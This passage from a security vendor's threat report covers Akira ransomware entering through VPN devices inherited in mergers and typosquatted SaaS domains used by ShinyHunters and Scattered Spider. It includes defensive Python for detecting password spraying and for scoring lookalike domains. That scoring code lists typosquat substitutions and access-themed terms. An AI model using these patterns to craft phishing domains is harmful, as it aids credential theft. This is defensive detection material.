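def detect_spray_then_success(records, window=timedelta(minutes=10), min_fail_ips=3):
    """Per user: failures from >= min_fail_ips distinct hosting IPs within `window`,
    then a success from a hosting IP, suggests the account has been taken."""
    by_user = defaultdict(list)
    for rec in records:
        by_user[rec["user"]].append(rec)

    alerts = []
    for user, recs in by_user.items():
        recs.sort(key=lambda r: r["ts"])
        for i, rec in enumerate(recs):
            if rec["result"] != "SUCCESS" or not is_hosting(rec["src"]):
                continue
            fail_ips = {p["src"] for p in recs[:i]
                        if p["result"] == "FAIL" and is_hosting(p["src"])
                        and rec["ts"] - p["ts"] <= window}
            if len(fail_ips) >= min_fail_ips:
                alerts.append({"user": user, "success_at": rec["ts"].isoformat(),
                               "success_src": rec["src"], "failed_from": sorted(fail_ips)})
                break
    return alerts


if __name__ == "__main__":
    for alert in detect_spray_then_success(parse_vpn_log(SAMPLE_VPN_LOG)):
        print(alert)
```

Geo-blocking and per-IP reputation miss this because each address contributes one or two attempts; keying on the account and on the hosting tag is what makes the spread visible, and the success-from-hosting condition is the trigger for disabling the account and the VPN session together.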
The M&A Risk Factor
Across the Akira-associated incidents we investigated, M&A was a consistent enabling factor. Akira repeatedly breached larger enterprises through inherited devices—assets that often sit in a governance gray zone during transition periods and carry forward legacy configurations, stale credentials, and delayed patching. These inherited edge devices become “unknown” or poorly monitored internet-facing entry points that attackers can use to bypass the acquiring company’s stronger, centralized controls.
SonicWall appears in these scenarios largely because of its ubiquity in mid-market environments, driven by affordability and ease of use. We can’t say with certainty whether Akira deliberately targeted SonicWall or the M&A process itself, but the pattern fits how ransomware groups operate. They gravitate towards targeting remote-access surfaces that are widely deployed, internet-exposed, and unevenly patched—conditions that worsen during rushed migrations and integration. This reality reflects the inherent risk of managing widespread remote-access fleets, not a flaw unique to any one vendor.
Incomplete asset inventories and patchy logging create blind spots that even robust security stacks cannot cover. Organizations should treat inherited infrastructure as part of the external attack surface from day one. Use automated discovery tools to immediately inventory internet-facing devices and identities brought in through M&A; force credential resets; patch aggressively; and bring logging and EDR visibility online (including VPN and authentication telemetry) before expanding connectivity.
Fundamentally, this is a problem of speed and coverage: If you can’t quickly discover what assets you own and continuously confirm they’re patched and monitored, attackers will.
Typosquatting Still Works and It Scales into SaaS
Fake domains remain one of the most reliable paths to initial access because phishing basics still win. In 2025, we repeatedly saw threat actors weaponize typosquatted (deceptive lookalike) domains to steal credentials and OAuth tokens, using them to skip authentication checks and move directly into high-value software-as-a-service (SaaS) and cloud environments. By registering lookalike domains tailored to specific industries and services, attackers improved success rates and amplified the impact of each campaign.
This tactic isn’t likely to fade. It’s low-cost, consistently effective, and, when it succeeds, the access can look legitimate long enough for data theft to begin.
ShinyHunters Targets SaaS Platforms
One of the most impactful examples we tracked was a 4-month campaign by financially motivated threat group “ShinyHunters” targeting Salesforce customer relationship management (CRM) credentials. ShinyHunters gained notoriety in 2020 through a series of large-scale data breaches and extortion campaigns targeting global brands. In this campaign, we saw ticket-themed lures and domains that mimicked trusted support workflows and internal tools, exploiting predictable behavior like clicking “support” links without hesitation.
* Figure 2: A screenshot of a sign-up form
Our research revealed a pattern that helps forecast likely targeting. Domains were registered in clusters, often shortly before public reporting on victim breaches, and frequently tailored to specific brands. They were carefully crafted to appear authentic, relying on slight spelling, structure, or branding variations. For example, we identified domains registered just days before a reported breach affecting a major fashion outlet:
Domains Blurred Across ShinyHunters, Scattered Spider, and Scattered Lapsus$ Hunters
Through our investigation, we found evidence suggesting overlap or coordination between ShinyHunters and Scattered Spider, based on domains impersonating technology vendors and access workflows. Many of the domains used terms like “helpdesk” and “SSO” to mimic sign-on portals, VPNs, and IT support systems, intentionally aiming for credentials that unlock infrastructure-level access.
Later in the year, we saw a resurgence in this technique when we identified over 40 typosquatted domains impersonating Zendesk portals. In the process, we observed signs of a new coalition known as “Scattered Lapsus$ Hunters” (which likely involves members of Scattered Spider, ShinyHunters, and hacking group “Lapsus$”) operating the same playbook: Registering fake domains targeting SaaS platforms that unlocked downstream customer data and internal workflows, while early access still looked like normal sign-in activity. ShinyHunters’ launch of a data-leak site reinforced how quickly credential theft can turn into an end-to-end extortion pipeline.
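The registration pattern described above, brand names with slight variations plus access-themed terms such as “helpdesk” and “SSO”, is what a lookalike-domain monitor scores when new registrations or certificate-transparency entries come in. The following is an added example (not ReliaQuest's code and not a GreyMatter Digital Risk Protection feature): it normalizes common character substitutions, checks a brand watchlist by containment and edit distance, and adds points for access terms and hyphenated labels. The watchlist, allowlist, and candidate domains (all under the reserved `.invalid` TLD) are constructed for illustration.

```python
# Added example (not ReliaQuest's code): score newly observed domains against a
# brand watchlist and the access-themed terms ("helpdesk", "sso", ...) described
# above. The brand list, allowlist and candidate domains are constructed.
BRANDS = ["zendesk", "salesforce", "okta"]
LEGIT_DOMAINS = {"zendesk.com", "salesforce.com", "okta.com"}
ACCESS_TERMS = ["helpdesk", "sso", "vpn", "support", "login", "ticket", "portal"]
# Common substitutions in typosquats, mapped back to the letters they imitate.
CONFUSABLES = {"0": "o", "1": "l", "3": "e", "5": "s", "7": "t", "rn": "m", "vv": "w"}

# Constructed candidates as they might arrive from a registration feed.
SAMPLE_DOMAINS = [
    "zendesk-sso-helpdesk.invalid",
    "zend3sk-support.invalid",
    "salesforce-ticket-login.invalid",
    "zemdesk.invalid",
    "weather-news.invalid",
    "zendesk.com",
]


def normalize(label):
    """Undo digit/letter substitutions so 'zend3sk' compares as 'zendesk'."""
    out = label
    for lookalike, letter in CONFUSABLES.items():
        out = out.replace(lookalike, letter)
    return out


def levenshtein(a, b):
    """Standard edit distance (insert, delete, substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def score_domain(domain):
    """Return (score, reasons) for one domain; 0 for allowlisted brand domains."""
    host = domain.lower().rstrip(".")
    if host in LEGIT_DOMAINS:
        return 0, []
    labels = host.split(".")
    registrable = labels[-2] if len(labels) >= 2 else labels[0]
    norm = normalize(registrable)
    score, reasons = 0, []
    for brand in BRANDS:
        if brand in norm:
            score += 3
            reasons.append("contains brand '" + brand + "'")
            break
        if levenshtein(norm.replace("-", ""), brand) <= 2:
            score += 3
            reasons.append("near-match of brand '" + brand + "'")
            break
    terms = [t for t in ACCESS_TERMS if t in norm]
    score += len(terms)
    reasons.extend("access term '" + t + "'" for t in terms)
    if norm != registrable:
        score += 1
        reasons.append("digit/letter substitution")
    if "-" in registrable:
        score += 1
        reasons.append("hyphenated label")
    return score, reasons


def rank_domains(domains, threshold=3):
    """Domains scoring at or above threshold, highest first, as (domain, score, reasons)."""
    scored = [(d,) + score_domain(d) for d in domains]
    return sorted([s for s in scored if s[1] >= threshold], key=lambda s: s[1], reverse=True)


if __name__ == "__main__":
    for domain, score, reasons in rank_domains(SAMPLE_DOMAINS):
        print(score, domain, reasons)
```

Scores are a triage order, not a verdict: a high-scoring domain registered days before any phishing is seen is the early warning the text refers to, and it feeds both blocklists and a rule that treats authentication referred from that domain as suspect.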
The biggest advantage of this technique is its modularity. One group can build and scale the lure and domain ecosystem while another operationalizes the access for data theft or extortion. That blurs “who did what,” but more importantly, it accelerates campaigns and widens the blast radius, because proven infrastructure and playbooks can be shared, reused, or franchised across victims and sectors.
Fake domains aren’t new to defenders. They’re durable attacker infrastructure that provides early warning, victim forecasting, and low-friction access. Organizations need visibility into internet-facing identity and SaaS access paths—and the ability to rapidly validate and contain suspicious authentication tied to newly observed lookalike domains before phished access turns into data theft and extortion.
Your Strategy for Combatting Deception and Identity Threats
Organizations need adaptive defenses to prepare for and tackle modern initial access techniques, whether that means neutralizing ClickFix-style deception, countering Scattered Spider’s help-desk social engineering, or staying ahead of evolving phishing tactics.
Automate and Streamline Phishing Responses
Phishing (with links or attachments) remained one of the top initial access risks in 2025. Proactive employee training and simulations reduce human error, but they don’t close the gap on their own. Organizations also need tools like GreyMatter Phishing Analyzer that can automatically and holistically detect, investigate, and contain phishing attempts that bypass secure email gateways and land in user inboxes.
Conduct Threat Hunting to Close Identity Hygiene Gaps
Attackers move too fast for purely reactive defense. The only way to stay protected is by implementing a proactive and predictive security operations program. Threat hunting helps surface and prioritize hygiene gaps that enable identity- and phishing-based intrusions—and drives remediation through enforcement controls and repeatable workflows. Examples of threat hunting packages available to GreyMatter customers include: